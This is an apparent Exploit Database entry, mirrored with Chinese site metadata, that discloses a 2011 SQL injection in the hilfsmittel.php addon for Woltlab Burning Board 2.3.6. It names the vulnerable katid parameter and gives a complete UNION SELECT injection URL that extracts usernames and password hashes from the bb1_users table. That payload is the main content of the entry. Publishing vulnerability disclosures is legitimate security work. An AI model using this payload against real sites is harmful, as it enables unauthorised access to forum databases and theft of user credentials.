Woltlab Burning Board 2.3.6 Addon – ‘hilfsmittel.php’ SQL Injection

• Exploit Database
• 8 阅读

• 作者： Crazyball
  日期： 2011-02-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16202/

• #####################################################################################
  
   > Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability <
  
  #####################################################################################
  
  [+] Autor: Crazyball
  [+] Vulnerabilities [ SQL Injection ]
  [+] Page: http://www.euweb.at/
  [+] Language: [ PHP ]
  [+] Version: Hilfsmitteldatenbank 1.0 
  [+] Date: n/a
  [+] Vendor: http://www.woltlab.com/de/
  
  ##########################################################################################
  
  [+] Vulnerability
  
   hilfsmittel.php?action=read&katid=
  
  
  [+] Exploitable
  
   http://[host]/[path]/hilfsmittel.php?action=read&katid=5'/**/UNION/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10/**/FROM/**/bb1_users/*